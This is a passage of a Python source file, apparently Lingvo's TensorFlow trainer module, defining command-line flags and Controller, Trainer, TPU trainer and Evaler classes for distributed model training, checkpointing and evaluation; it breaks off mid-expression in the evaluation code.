# Lint as: python2, python3 # Copyright 2018 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== # pylint: disable=line-too-long """Trainer. To run locally: .. code-block:: bash $ bazel build -c opt //lingvo:trainer $ bazel-bin/lingvo/trainer --logtostderr \ --model=image.mnist.LeNet5 --mode=sync --logdir=/tmp/lenet5 \ --run_locally=cpu To use GPU, add `--config=cuda` to build command and set `--run_locally=gpu`. """ # pylint: enable=line-too-long from __future__ import absolute_import from __future__ import division from __future__ import print_function import inspect import os import re import threading import time from lingvo import base_trial from lingvo import model_registry import lingvo.compat as tf from lingvo.core import base_model from lingvo.core import base_model_params from lingvo.core import cluster_factory from lingvo.core import inference_graph_exporter from lingvo.core import metrics from lingvo.core import py_utils import numpy as np import six from six.moves import range from six.moves import zip from lingvo import base_runner from tensorflow.contrib.tpu.python.tpu import device_assignment as device_assignment_lib from tensorflow.contrib.tpu.python.tpu import tpu_function from tensorflow.core.protobuf import config_pb2 from tensorflow.python.tpu import training_loop as tpu_training_loop # pylint:disable=g-direct-tensorflow-import from tensorflow.python.tpu.ops import tpu_ops # pylint:disable=g-direct-tensorflow-import tf.flags.DEFINE_string( 'model', '', 'Name of the model class to train.' 'Must be a model defined in the model_registry.') tf.flags.DEFINE_string( 'model_task_name', '', 'For multitask models: ' 'select task to train/evaluate/decode. ' 'Empty means to sample a task (training only).') tf.flags.DEFINE_string('logdir', '', 'Log directory.') tf.flags.DEFINE_bool( 'interactive', False, 'If True, enter interactive IPython for the controller job.') tf.flags.DEFINE_string( 'run_locally', '', 'Can be empty, cpu, or gpu. If not empty, ignores cluster configuration ' 'flags and runs controller and trainer in a single local process.') tf.flags.DEFINE_string('tf_master', '', 'TF runtime.') tf.flags.DEFINE_string( 'cluster_spec', '', 'A tf.train.ClusterSpec to override the master. ' 'The dict is specified as: job=host1:port1,host2:port2,' 'host3:port3@job2=host3:port4,...') tf.flags.DEFINE_string( 'mode', 'async', 'How this trainer binary is used. ' 'async: used in an async training setup; ' 'sync: used in a sync training setup; ' 'shell: an interactive shell for development; ' 'inspect_evaler: print evaler dataset names; ' 'inspect_decoder: print decoder dataset names; ' 'write_inference_graph: write inference graphs to logdir.') tf.flags.DEFINE_string('job', '', 'trainer/controller/eval, etc.') tf.flags.DEFINE_integer('task', 0, 'Task id within the job.') tf.flags.DEFINE_string('controller_job', '/job:controller', 'Job name.') tf.flags.DEFINE_integer('controller_gpus', 0, 'Number of controller GPUs.') tf.flags.DEFINE_string('worker_job', '/job:trainer', 'Job name.') tf.flags.DEFINE_integer('worker_replicas', 1, 'Number of replicas.') tf.flags.DEFINE_integer('worker_gpus', 0, 'Number of gpus to use per replica.') tf.flags.DEFINE_integer('worker_tpus', 0, 'Number of tpus to use per replica.') tf.flags.DEFINE_integer('worker_num_tpu_hosts', 0, 'Number of tpu hosts.') tf.flags.DEFINE_integer('worker_split_size', 1, 'Number of devices for one split.') tf.flags.DEFINE_string('ps_job', '/job:ps', 'Job name') tf.flags.DEFINE_integer('ps_replicas', 1, 'Number of replicas.') tf.flags.DEFINE_integer('ps_gpus', 0, 'Number of gpus to use per replica.') tf.flags.DEFINE_string('input_job', '/job:input', 'Job name') tf.flags.DEFINE_integer('input_replicas', 0, 'Number of replicas.') tf.flags.DEFINE_string( 'input_targets', '', 'Target network addresses for the ' 'input job. E.g., a single ip:port, or a list of ' 'comma-separated grpc://ip:port, etc.') tf.flags.DEFINE_string('evaler_job', '/job:evaler', 'Job name') tf.flags.DEFINE_integer('evaler_replicas', 0, 'Number of replicas.') tf.flags.DEFINE_integer('evaler_gpus', 0, 'Number of gpus to use per replica.') tf.flags.DEFINE_string('decoder_job', '/job:decoder', 'Job name') tf.flags.DEFINE_integer('decoder_replicas', 0, 'Number of replicas.') tf.flags.DEFINE_integer('decoder_gpus', 0, 'Number of gpus to use per replica.') tf.flags.DEFINE_bool( 'evaler_in_same_address_as_controller', False, 'Whether or not evaler is in the same address space as ' ' controller. This flag is meant for unittest only.') tf.flags.DEFINE_string( 'vizier_reporting_job', 'evaler', 'Job reponsible for reporting metrics. This specifies a ' 'job prefix, evaler will match all evaler jobs, while ' 'evaler_dev and decoder_dev will only match the corresponding ' 'jobs that are on the dev set.') tf.flags.DEFINE_integer( 'enqueue_max_steps', None, 'Max enqueue steps. -1 meaning no limit.' ' This flag should be set for unit-test only.') tf.flags.DEFINE_integer('saver_max_to_keep', None, 'Maximum number of recent checkpoints to keep.') tf.flags.DEFINE_float('saver_keep_checkpoint_every_n_hours', None, 'How often to keep a checkpoint.') # Please consider adding model params instead of adding flags. FLAGS = tf.flags.FLAGS # Map from split size to computation_shape for TPU model parallelism. SUPPORTED_SPLIT_SIZE = { 1: [1, 1, 1], 2: [1, 1, 2], 4: [1, 2, 2], 8: [2, 2, 2], 16: [4, 2, 2], 32: [4, 4, 2], 64: [4, 8, 2], 128: [8, 8, 2] } def ComputationShape(split_size): """Decides the computation shape based on the split_size.""" assert (split_size in SUPPORTED_SPLIT_SIZE), ('Model parallelism with %d', 'devices is currently not' ' supported.' % split_size) return SUPPORTED_SPLIT_SIZE[split_size] # useful for debugging. def _StartShell(local_ns=None): # An interactive shell is useful for debugging/development. import IPython # pylint: disable=g-import-not-at-top user_ns = {} if local_ns: user_ns.update(local_ns) user_ns.update(globals()) IPython.start_ipython(argv=[], user_ns=user_ns) def _ModelAnalysis(model): """Returns a text showing variable sizes and their total size.""" class Analyzer(object): def __init__(self): self._seen_var = {} self.total = 0 def __call__(self, v): assert isinstance(v, tf.Variable) # pylint: disable=protected-access if not v.shape.is_fully_defined(): # Only Cudnn RNN params lack static shapes. if hasattr(v, 'approx_size'): size = v.approx_size else: return '%-20s %10s %s' % (v.shape, 'n/a', v._shared_name) else: size = v.shape.num_elements() if v._shared_name not in self._seen_var: self._seen_var[v._shared_name] = size self.total += size return '%-20s %10d %s' % (v.shape, size, v._shared_name) analyzer = Analyzer() output = '\n' output += model.vars.Transform(analyzer).DebugString() output += '\n' output += '=' * 100 output += '\ntotal #params: %10d\n' % (analyzer.total) return output, analyzer.total class Controller(base_runner.BaseRunner): """Controller for a training cluster.""" def __init__(self, *args, **kwargs): super(Controller, self).__init__(*args, **kwargs) assert not self._model_task_name, 'Controller needs all tasks!' self._save_path = os.path.join(self._train_dir, 'ckpt') tf.gfile.MakeDirs(self._train_dir) self._control_dir = os.path.join(self._logdir, 'control') tf.gfile.MakeDirs(self._control_dir) self._summary_writer = self._CreateSummaryWriter(self._control_dir) self._time_steps = [] # A short history of (timestamp, global_step) with self._graph.as_default(), tf.container(self._container_id): with self._cluster, tf.device(self._cluster.GetPlacer()): self._model = self.params.Instantiate() self._params = self._model.params self._model.ConstructFPropBPropGraph() self._saver = self._GetSaver() self._summary_op = tf.summary.merge_all() self._vars = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES) self._uninitialized = tf.report_uninitialized_variables(self._vars) self._initialize_all = tf.global_variables_initializer() self.initialize_tables = tf.tables_initializer() self._initialize_local_vars = tf.local_variables_initializer() self.enqueue_ops = tf.get_collection(py_utils.ENQUEUE_OPS) self.close_queue_ops = tf.get_collection(py_utils.CLOSE_QUEUE_OPS) self._ExportMetrics(params=self.params) self._model_analysis, self._total_num_params = _ModelAnalysis(self._model) py_utils.LogMultiLines('MODEL ANALYSIS', self._model_analysis) self._WriteToLog(self._model_analysis, self._control_dir, 'model_analysis.txt') self._WriteToLog(self.params.ToText(), self._control_dir, 'params.txt') tf.train.write_graph(self._graph.as_graph_def(), self._control_dir, 'train.pbtxt') def Start(self): self._RunLoop('controller', self._Loop) def StartEnqueueOp(self, op): self._RunLoop( 'controller/enqueue_op/%s' % op.name, self._LoopEnqueue, loop_args=[op]) def _Loop(self): self._summary_writer.add_graph(self._graph) with tf.container(self._container_id), self._GetSession() as sess: gsteps = py_utils.GetGlobalStep() examples = self._model.total_examples if FLAGS.interactive: # Into interactive debugging mode. _StartShell(locals()) return # This initializes local tables sess.run(self.initialize_tables) # This initializes local variables. sess.run(self._initialize_local_vars) # TODO(zhifengc): Moves these options into params. tp = self.params.train save_interval_seconds = tp.save_interval_seconds summary_interval_steps = tp.summary_interval_steps next_checkpoint_seconds = 0 next_summary_step = 1 while True: now = time.time() next_iteration_seconds = now + min( 10, save_interval_seconds) # 10 seconds or less # Init/restore variable if needed. self._RestoreIfNeeded(sess) global_step, total_examples = sess.run([gsteps, examples]) step_rate, example_rate = self._RecordStepRate(global_step, total_examples) if self._trial.ShouldStop() or self._ShouldStop(sess, global_step): tf.logging.info('Training finished.') self._Save(sess, global_step) # Close all the queues so the enqueue threads can also finish. for close_op in self.close_queue_ops: sess.run(close_op) sess.close() return # Checkpoint. if now >= next_checkpoint_seconds: self._Save(sess, gsteps) next_checkpoint_seconds = now + save_interval_seconds # Summary. if self._summary_op is not None and global_step >= next_summary_step: tf.logging.info('Write summary @%s', global_step) summary_str = sess.run(self._summary_op) if isinstance(summary_str, np.ndarray) and summary_str.size == 0: tf.logging.info('Skipping summary: %s', summary_str) else: self._summary_writer.add_summary(summary_str, global_step) self._SummarizeValue(global_step, 'total_num_params', self._total_num_params) next_summary_step = global_step + summary_interval_steps tf.logging.info('Write summary done: step %d', global_step) self._SetStatusMessage( 'step:%6d, steps/sec: %0.2f, examples/sec: %0.2f' % (global_step, step_rate, example_rate)) self._ExportMetrics( global_step=global_step, step_rate=step_rate, example_rate=example_rate) now = time.time() if now < next_iteration_seconds: time.sleep(next_iteration_seconds - now) def _Save(self, sess, gsteps): tf.logging.info('Save checkpoint') path = self._saver.save(sess, self._save_path, gsteps) tf.logging.info('Save checkpoint done: %s', path) def _Restore(self, sess): path = tf.train.latest_checkpoint(self._train_dir) if path: tf.logging.info('Load from checkpoint %s.', path) self._saver.restore(sess, path) tf.logging.info('Load checkpoint done.') return path def _RestoreIfNeeded(self, sess): uninitialized_var_names = list(sess.run(self._uninitialized)) if not uninitialized_var_names: return tf.logging.info('Uninitialized var list: %s ', uninitialized_var_names) if self._Restore(sess): return if (not any(task.params.train.init_from_checkpoint_rules for task in self._model.tasks) and not self._params.train.init_from_checkpoint_rules): tf.logging.info('Initialize ALL variables: %s', uninitialized_var_names) sess.run([self._initialize_all]) tf.logging.info('Initialize variables done.') return # There was a race in local run. Another thread will get unblocked once # _initialize_all is called. OverrideVarsFromCheckpoints # might not happen at the right time. for task in self._model.tasks: tp = task.params.train if tp.init_from_checkpoint_rules: tf.logging.info('OverrideVarsFromCheckpoints %s', tp.init_from_checkpoint_rules) py_utils.OverrideVarsFromCheckpoints(sess, self._vars, tp.init_from_checkpoint_rules) if self._params.train.init_from_checkpoint_rules: tp = self._params.train tf.logging.info('OverrideVarsFromCheckpoints %s', tp.init_from_checkpoint_rules) py_utils.OverrideVarsFromCheckpoints(sess, self._vars, tp.init_from_checkpoint_rules) uninitialized_var_names = list(sess.run(self._uninitialized)) if not uninitialized_var_names: return # uninitialized_var_names is a list of strings without ":0" suffix. assert all(isinstance(s, str) for s in uninitialized_var_names) # Need to retrieve vars, removing ":0" suffix from names. uninitialized_vars = [ v for v in self._vars if v.name[:-2] in uninitialized_var_names ] tf.logging.info('Initialize variables: %s', [v.name for v in uninitialized_vars]) sess.run(tf.variables_initializer(uninitialized_vars)) def _SummarizeValue(self, steps, tag, value): self._summary_writer.add_summary( metrics.CreateScalarSummary(tag, value), steps) def _RecordStepRate(self, current_steps, total_examples): """Computes the overall step rate and adds a summary.""" self._time_steps.append((time.time(), current_steps, total_examples)) # Keeps a relative long history to compute a smooth steps/second. # Removes duplicate stats for step = 0 to get rid of the warm-up period. while (self._time_steps[-1][1] - self._time_steps[0][1] > 10000 or (len(self._time_steps) > 1 and self._time_steps[0][1] == self._time_steps[1][1])): del self._time_steps[0] (t0, s0, e0), (t1, s1, e1) = self._time_steps[0], self._time_steps[-1] rate = 0.0 example_rate = 0.0 if t1 > t0 + 1: elapsed_secs = t1 - t0 rate = (s1 - s0) / elapsed_secs example_rate = (e1 - e0) / elapsed_secs tf.logging.info('Steps/second: %f, Examples/second: %f', rate, example_rate) self._SummarizeValue(current_steps, 'global_step/sec', rate) self._SummarizeValue(current_steps, 'examples/sec', example_rate) return rate, example_rate class Trainer(base_runner.BaseRunner): """Trainer on non-TPU.""" def __init__(self, *args, **kwargs): super(Trainer, self).__init__(*args, **kwargs) with self._graph.as_default(), tf.container(self._container_id): with self._cluster, tf.device(self._cluster.GetPlacer()): self._model = self.params.Instantiate() self._params = self._model.params self._model.ConstructFPropBPropGraph() self.initialize_tables = tf.tables_initializer() self._initialize_local_vars = tf.local_variables_initializer() self.enqueue_ops = tf.get_collection(py_utils.ENQUEUE_OPS) self.close_queue_ops = tf.get_collection(py_utils.CLOSE_QUEUE_OPS) tf.logging.info('Trainer number of enqueue ops: %d', len(self.enqueue_ops)) try: self._task_probs_summary_writers = [] for task in self._model.task_schedule.tasks: path = os.path.join(os.path.join(self._train_dir, task)) tf.gfile.MakeDirs(path) self._task_probs_summary_writers.append(self._CreateSummaryWriter(path)) except AttributeError: tf.logging.info('AttributeError. Expected for single task models.') self._task_probs_summary_writers = [] # Saves the graph def. if self.params.cluster.task > 0: self._summary_writer = None else: self._summary_writer = self._CreateSummaryWriter(self._train_dir) tf.train.write_graph(self._graph.as_graph_def(), self._train_dir, 'train.pbtxt') worker_id = self.params.cluster.task self._start_up_delay_steps = (((worker_id + 1) * worker_id / 2) * self.params.train.start_up_delay_steps) def _SummarizeValue(self, steps, tag, value, writer): if writer: writer.add_summary(metrics.CreateScalarSummary(tag, value), steps) def Start(self): self._RunLoop('trainer', self._Loop) def StartEnqueueOp(self, op): self._RunLoop( 'trainer/enqueue_op/%s' % op.name, self._LoopEnqueue, loop_args=[op]) def _LoopEnqueue(self, op): # Evaler/Controller jobs may find that the trial is infeasible and report # done earlier. This is an important check since the trainer may retry # indefinitely without it. if self._trial.ShouldStop(): tf.logging.info('Training skipped (trial requested to stop).') return return super(Trainer, self)._LoopEnqueue(op) def _Loop(self): # Evaler/Controller jobs may find that the trial is infeasible and report # done earlier. This is an important check since the trainer may retry # indefinitely without it. if self._trial.ShouldStop(): tf.logging.info('Training skipped (trial requested to stop).') return with tf.container(self._container_id), self._GetSession() as sess: # This initializes local tables sess.run(self.initialize_tables) # This initializes local variables. sess.run(self._initialize_local_vars) global_step = None @py_utils.Retry(retry_value=(tf.errors.FailedPreconditionError,)) def _WaitTillInit(): """Wait until the model is ready.""" try: global_step = sess.run(py_utils.GetGlobalStep()) except tf.errors.FailedPreconditionError as e: tf.logging.info('Probably the expected race on global_step: %s', e) raise msg = 'step:%6d' % global_step self._SetStatusMessage(msg) if global_step < self._start_up_delay_steps: msg = 'global step (%d) has not reached start up delay steps (%d)' % ( global_step, self._start_up_delay_steps) tf.logging.info('%s', msg) raise tf.errors.FailedPreconditionError( node_def=None, op=None, message=msg) return global_step global_step = _WaitTillInit() status_interval_steps = 100 next_status_step = 1 eval_metrics = None while True: if (self._trial.ShouldStopAndMaybeReport(global_step, eval_metrics) or self._ShouldStop(sess, global_step)): tf.logging.info('Training finished.') # Close all the queues so the enque threads can also finish. for close_op in self.close_queue_ops: sess.run(close_op) if self._early_stop: time.sleep(300) # controller hangs if it doesn't finish first return # If a task is explicitly specified, only train that task. if self._model_task_name: model_task = self._model.GetTask(self._model_task_name) else: # Note: This is a slightly stale global_step value from the previous # sess.run() call. # For multi-task models, `self._model.task_schedule.cur_probs` will # be updated. model_task = self._model.SampleTask(global_step) if self._task_probs_summary_writers: for index, prob in enumerate(self._model.task_schedule.cur_probs): self._SummarizeValue(global_step, 'task_probability', prob, self._task_probs_summary_writers[index]) try: for index, task in enumerate(self._model.tasks): self._SummarizeValue(global_step, 'task_weight', sess.run(task.vars.task_weight), self._task_probs_summary_writers[index]) except AttributeError: pass _, global_step, eval_metrics, per_example_tensors = sess.run([ model_task.train_op, py_utils.GetGlobalStep(), model_task.eval_metrics, model_task.per_example_tensors, ]) msg = 'step:%6d' % global_step for key, (val, _) in sorted(six.iteritems(eval_metrics)): msg += ' %s:%.8g' % (key, val) self._SummarizeValue(global_step, key, val, self._summary_writer) model_task.ProcessFPropResults(sess, global_step, eval_metrics, per_example_tensors) if global_step >= next_status_step: self._SetStatusMessage(msg) next_status_step = global_step + status_interval_steps else: tf.logging.info(msg) self._model.ProcessFPropResults(sess, global_step, eval_metrics, per_example_tensors) class TrainerTpu(base_runner.BaseRunner): """Trainer on TPU.""" def __init__(self, *args, **kwargs): super(TrainerTpu, self).__init__(*args, **kwargs) # Multiple TPU trainer tasks not tested/implemented. assert self._cluster.num_replicas == 1 data_parallelism = self._cluster.num_splits_per_client assert data_parallelism num_devices_per_split = self._cluster.num_devices_per_split tf.logging.info('data_parallelism: %d, num_devices_per_split: %d', data_parallelism, num_devices_per_split) self._steps_per_loop = min(self.params.train.tpu_steps_per_loop, self.params.train.max_steps) self._initialized = threading.Event() tf.logging.info( 'Creating TrainerTpu using data parallelism %s ' 'and %s steps_per_loop', data_parallelism, self._steps_per_loop) @py_utils.RetryOnTransientTfError() def _WaitTillInit(): """Wait until the model is ready.""" try: # tpu.initialize_system() is called with None as embedding_config, as # embedding_config is not available yet. Later in _Loop, it is called # with the correct embedding_config. Since it cannot be called twice in # the same graph with different embedding_config, we use a dummy_graph # here. dummy_graph = tf.Graph() with dummy_graph.as_default(): tpu_initialize_system_op = tf.tpu.initialize_system( embedding_config=None, job=None) with self._GetSession(graph=dummy_graph) as sess: topology = sess.run(tpu_initialize_system_op) device_assignment = device_assignment_lib.device_assignment( topology, computation_shape=ComputationShape(num_devices_per_split), num_replicas=data_parallelism) py_utils.SetTpuDeviceAssignment(device_assignment) tf.logging.info('device_assignment.core_assignment: %s', str(device_assignment.core_assignment)) tf.logging.info('device_assignment.topology.device_coordinates: %s', str(device_assignment.topology.device_coordinates)) except py_utils.transient_tf_errors as e: tf.logging.info('TPU initialization failed: %s', e) raise _WaitTillInit() with self._graph.as_default(), tf.container(self._container_id): with self._cluster, tf.device(self._cluster.job_spec.name): self._eval_metrics = metrics.TpuEvalMetrics() def TpuTrainStep(*args): """Train a shard of a batch on a single TPU core. Args: *args: metrics values from previous steps. Returns: New summed metrics values and a train_op. """ self._model = self.params.Instantiate() self._load_ops = tf.get_collection(py_utils.TPU_EMBEDDING_LOAD_OPS) self._retrieve_ops = tf.get_collection( py_utils.TPU_EMBEDDING_RETRIEVE_OPS) tpu_embedding_collection = tf.get_collection(py_utils.TPU_EMBEDDING) self._tpu_embedding = ( tpu_embedding_collection[0] if tpu_embedding_collection else None) self._model.ConstructFPropBPropGraph() per_step_eval_metrics = self._eval_metrics.SetMetrics( self._model.GetTask().eval_metrics, args) outfeed_op = self._OutfeedEnqueue( self._model.GetTask().per_example_tensors) summed_metrics = [] assert len(per_step_eval_metrics) == len(args) with tf.control_dependencies([outfeed_op]): for x, y in zip(per_step_eval_metrics, args): summed_metrics.append(x + y) return summed_metrics + [self._model.GetTask().train_op] @tpu_function.on_device_training_loop def TpuTrain(): loop_result = tpu_training_loop.repeat( self._steps_per_loop, TpuTrainStep, inputs=self._eval_metrics.initial_values, name='train_loop') # Final metrics are the avg across self._steps_per_loop steps. return self._eval_metrics.FinalizeMetrics(loop_result) batch_parallel_res = tf.tpu.batch_parallel( TpuTrain, num_shards=data_parallelism, device_assignment=py_utils.GetTpuDeviceAssignment()) outfeed_dequeue_op = self._OutfeedDequeueLoop( self._model.GetTask().per_example_tensors, self._steps_per_loop, self._cluster.num_splits_per_client) # Get metric result from a single replica; they are all same here. self._tpu_train_ops = [[t[0] for t in batch_parallel_res], outfeed_dequeue_op] self.initialize_tables = tf.tables_initializer() self._initialize_local_vars = tf.local_variables_initializer() self.enqueue_ops = tf.get_collection(py_utils.ENQUEUE_OPS) assert not tf.get_collection(py_utils.CLOSE_QUEUE_OPS) tf.logging.info('Trainer number of enqueue ops: %d', len(self.enqueue_ops)) self._summary_writer = self._CreateSummaryWriter(self._train_dir) # Saves the graph def. tf.train.write_graph(self._graph.as_graph_def(), self._train_dir, 'train.pbtxt') def _OutfeedEnqueue(self, per_example_tensors): if not per_example_tensors: return tf.no_op() per_example_tensors = py_utils.NestedMap(per_example_tensors) return tpu_ops.outfeed_enqueue_tuple(per_example_tensors.Flatten()) def _OutfeedDequeueLoop(self, per_example_tensors, num_loops, num_devices): """Process all per-example tensor outfeed data for a TPU sess.run. Args: per_example_tensors: dict of key -> tensor as generated by TpuTrainStep. num_loops: number of times that TpuTrainStep will be executed by TpuTrain. num_devices: number of TPU cores assigned to this process. Returns: A dict of per-example tensors from the latest TpuTrainStep. """ if not per_example_tensors: return tf.no_op() tensor_shapes = [ py_utils.GetShape(per_example_tensors[key]) for key in sorted(per_example_tensors) ] tensor_types = [ tf.as_dtype(per_example_tensors[key].dtype) for key in sorted(per_example_tensors) ] def LoopBody(i, *input_arrays): """Process outfeed data for a single TpuTrainStep. Args: i: current loop index. *input_arrays: One tf.TensorArray per outfeed tensor. Returns: i+1 (new index) plus post-write tf.TensorArray handles. """ # Outfeed ops execute on each JF node, so they must be located on the # nodes. outfeed_devices = [] device_assignment = py_utils.GetTpuDeviceAssignment() assert device_assignment for replica in range(device_assignment.num_replicas): for core in range(device_assignment.num_cores_per_replica): with tf.device(device_assignment.host_device(replica, core)): outfeed_devices.append( tpu_ops.outfeed_dequeue_tuple( tensor_types, tensor_shapes, device_ordinal=device_assignment.tpu_ordinal(replica, core))) offset = i * num_devices output_arrays = list(input_arrays) # Each output_array holds a different per-example tensor. We get results # for each tensor from each TPU for each TpuTrainStep call. for j in range(len(output_arrays)): for k in range(len(outfeed_devices)): output_arrays[j] = output_arrays[j].write(offset + k, outfeed_devices[k][j]) return tuple([i + 1] + output_arrays) def LoopCond(i, *output_arrays): del output_arrays return i < num_loops output_arrays = [ tf.TensorArray( tensor_types[i], size=num_loops * num_devices, element_shape=tensor_shapes[i]) for i in range(len(tensor_shapes)) ] # Loop once for each time that TpuTrainStep runs. output_arrays = tf.while_loop( LoopCond, LoopBody, [0] + output_arrays, parallel_iterations=1)[1:] concatenated_arrays = [array.concat() for array in output_arrays] return dict(zip(sorted(per_example_tensors), concatenated_arrays)) def Start(self): # Run training. self._RunLoop('trainer', self._Loop) def _InfeedLoop(self, sess): tf.logging.info('_InfeedLoop start') for _ in range(self._steps_per_loop): sess.run(self.enqueue_ops) def StartEnqueueOp(self, op): # When retrieve ops for TPU embedding is present, we use _InfeedLoop above # instead to make sure enqueue and retrieve does not happen at the same # time as required by TPU embedding. # We can remove this by using a tf.while_loop driven infeed op. if self._retrieve_ops: return self._RunLoop( 'trainer/enqueue_op/%s' % op.name, self._LoopEnqueue, loop_args=[op]) def _SummarizeValue(self, steps, tag, value): self._summary_writer.add_summary( metrics.CreateScalarSummary(tag, value), steps) def _LoopEnqueue(self, op): # Evaler/Controller jobs may find that the trial is infeasible and report # done earlier. This is an important check since the trainer may retry # indefinitely without it. if self._trial.ShouldStop(): tf.logging.info('Training skipped (trial requested to stop).') return # Wait for _Loop to initialize variables first before attempting to infeed. self._initialized.wait() return super(TrainerTpu, self)._LoopEnqueue(op) def _Loop(self): # Evaler/Controller jobs may find that the trial is infeasible and report # done earlier. This is an important check since the trainer may retry # indefinitely without it. if self._trial.ShouldStop(): tf.logging.info('Training skipped (trial requested to stop).') return with tf.container(self._container_id), self._GetSession() as sess: config_proto = ( self._tpu_embedding.config_proto if self._tpu_embedding is not None else None) sess.run( tf.tpu.initialize_system(embedding_config=config_proto, job=None)) sess.run(self.initialize_tables) sess.run(self._initialize_local_vars) if FLAGS.run_locally == 'tpu': sess.run(tf.global_variables_initializer()) gsteps = py_utils.GetGlobalStep() global_step = sess.run(gsteps) self._initialized.set() eval_metrics = None sess.run(self._load_ops) while True: if self._trial.ShouldStopAndMaybeReport(global_step, eval_metrics): # Early terminate gracefully by setting a new max step horizon: three # more TPU steps to ensure that the enqueue ops can gracefully # terminate as well. if self._max_steps is None: self._max_steps = global_step + 3 * self._steps_per_loop tf.logging.info('Early stopping at step: %d', self._max_steps) if self._ShouldStop(sess, global_step): tf.logging.info('Training finished.') return if self._retrieve_ops: infeed_loop_thread = threading.Thread( target=self._InfeedLoop, args=(sess,)) infeed_loop_thread.start() values, outfeeds = sess.run(self._tpu_train_ops) if self._retrieve_ops: infeed_loop_thread.join() tf.logging.info('Retrieve params.') sess.run(self._retrieve_ops) tf.logging.info('Retrieve params done.') eval_metrics = self._eval_metrics.PackMetricsValues(values) # Note: global_step is incremented by self._steps_per_loop by the # previous sess.run call. global_step = sess.run(gsteps) msg = 'step:%6d' % global_step for key, (val, _) in sorted(six.iteritems(eval_metrics)): msg += ' %s:%.8g' % (key, val) self._SummarizeValue(global_step, key, val) self._SetStatusMessage(msg) task = self._model.GetTask() if not task.per_example_tensors: outfeeds = {} task.ProcessFPropResults(sess, global_step, eval_metrics, outfeeds) self._model.ProcessFPropResults(sess, global_step, eval_metrics, outfeeds) def _GetSpecificCheckpoint(load_checkpoint_from): """Returns a specific checkpoint given `load_checkpoint_from`. When load_checkpoint_from is a directory, we find the latest checkpoint in the directory and use that as the checkpoint to evaluate. When load_checkpoint_from is a specific checkpoint, we validate the path and return it. Args: load_checkpoint_from: If not None, specifies the directory or specific checkpoint to load. If a directory, the latest checkpoint in the directory will be used. """ if not load_checkpoint_from: # No location specified, use existing train_dir. return None # If load_checkpoint_from is a directory, return the latest # checkpoint in the directory. if tf.io.gfile.isdir(load_checkpoint_from): return tf.train.latest_checkpoint(load_checkpoint_from) # We assume that load_checkpoint_from is a specific checkpoint to # evaluate since it is not a directory. # # Check validity of eval path by looking for the index file. if tf.io.gfile.exists(load_checkpoint_from + '.index'): return load_checkpoint_from # Fail if we see an unexpected load_checkpoint_from. # # This might happen if load_checkpoint_from refers to a checkpoint # but the index file cannot be found. raise ValueError('Invalid load_checkpoint_from: %s' % load_checkpoint_from) class Evaler(base_runner.BaseRunner): """Evaler.""" def __init__(self, eval_type, *args, **kwargs): super(Evaler, self).__init__(*args, **kwargs) self._job_name = 'evaler_' + eval_type self._output_name = 'eval_' + eval_type self.params.is_eval = True self._eval_dir = os.path.join(self._logdir, self._output_name) if self._model_task_name: self._eval_dir += '_' + str(self._model_task_name) tf.gfile.MakeDirs(self._eval_dir) self._eval_path = _GetSpecificCheckpoint( self.params.task.eval.load_checkpoint_from) self._summary_writer = self._CreateSummaryWriter(self._eval_dir) self._should_report_metrics = self._job_name.startswith( FLAGS.vizier_reporting_job) with self._graph.as_default(), tf.container(self._container_id): with self._cluster, tf.device(self._cluster.GetPlacer()): self._model = self.params.Instantiate() self._params = self._model.params # Always create the same graph to make sure node names are always # exactly the same. self._model.ConstructFPropGraph() self._model_task = self._model.GetTask(self._model_task_name) self._saver = self._GetSaver() self.initialize_tables = tf.tables_initializer() self._initialize_local_vars = tf.local_variables_initializer() # No queues are allowed for eval models. self.enqueue_ops = tf.get_collection(py_utils.ENQUEUE_OPS) assert not self.enqueue_ops # Saves the graph def. self._WriteToLog(self.params.ToText(), self._eval_dir, 'params.txt') if self.params.cluster.task == 0: tf.train.write_graph(self._graph.as_graph_def(), self._eval_dir, '%s.pbtxt' % self._output_name) def Start(self): self._RunLoop(self._job_name, self._Loop) def _Loop(self): """The main loop.""" with tf.container(self._container_id), self._GetSession() as sess: # This initializes local tables sess.run(self.initialize_tables) # This initializes local variables. sess.run(self._initialize_local_vars) if self._eval_path: self._EvalOnce(self._eval_path, sess) else: path = None while True: path = self._FindNewCheckpoint(path, sess) if not path or self._EvalOnce(path, sess): break # Maybe evaluate the last checkpoint if we are not given a specific # checkpoint to evaluate. if self._eval_path is None: self.EvalLatestCheckpoint(path) if self._should_report_metrics: self._trial.ReportDone() tf.logging.info('Evaluation finished.') def EvalLatestCheckpoint(self, last_path=None): """Runs eval once on the latest checkpoint.""" with tf.container(self._container_id), self._GetSession() as sess: # This initializes local tables sess.run(self.initialize_tables) # This initializes local variables. sess.run(self._initialize_local_vars) path = tf.train.latest_checkpoint(self._train_dir) if not path: tf.logging.info('No checkpoint available.') return elif path == last_path: tf.logging.info('Latest checkpoint was already evaluated.') return self._EvalOnce(path, sess) def _EvalOnce(self, path, sess): """Runs evaluation for a batch of samples. Args: path: checkpoint path. sess: the tf Session. Returns: should_stop. """ if not FLAGS.evaler_in_same_address_as_controller: self._LoadCheckpointForEval(sess, path) global_step = sess.run(py_utils.GetGlobalStep()) # Check after how many steps checkpoint got saved. # And decide whether to run an evaluation. if global_step < self._model_task.params.eval.start_eval_after: return False metrics_dict = { name: metrics.AverageMetric() for name in self._model_task.eval_metrics } num_samples_metric = metrics_dict['num_samples_in_batch'] while (num_samples_metric.total_value < self._model_task.params.eval.samples_per_summary): # NOTE: We intentionally do not let FProp generate summaries by default, # because evaler calls FProp multiple times for each checkpoint. Multiple # summaries at the same step is often confusing. Instead, models should # update eval_metrics and generate aggregate summaries. ans = sess.run(self._model_task.eval_metrics) for name, (value, weight) in six.iteritems(ans): metrics_dict[name].Update(value, weight) tf.logging.info('Total examples done: %d/%d', num_samples_metric.total_value, self._model_task.params.eval.samples_per_summary) # Replace average values with total values for certain metrics. if 'num_predictions' in metrics_dict: metrics_dict['num_predictions'].total_weight = 1.0 if 'num_words' in metrics_dict: metrics_dict['num_words'].total_weight = 1.0 # When we have evaluated so many samples, generate a summary. self._WriteSummaries( self._summary_writer, os.path.basename(self._eval_dir), global_step, {k: 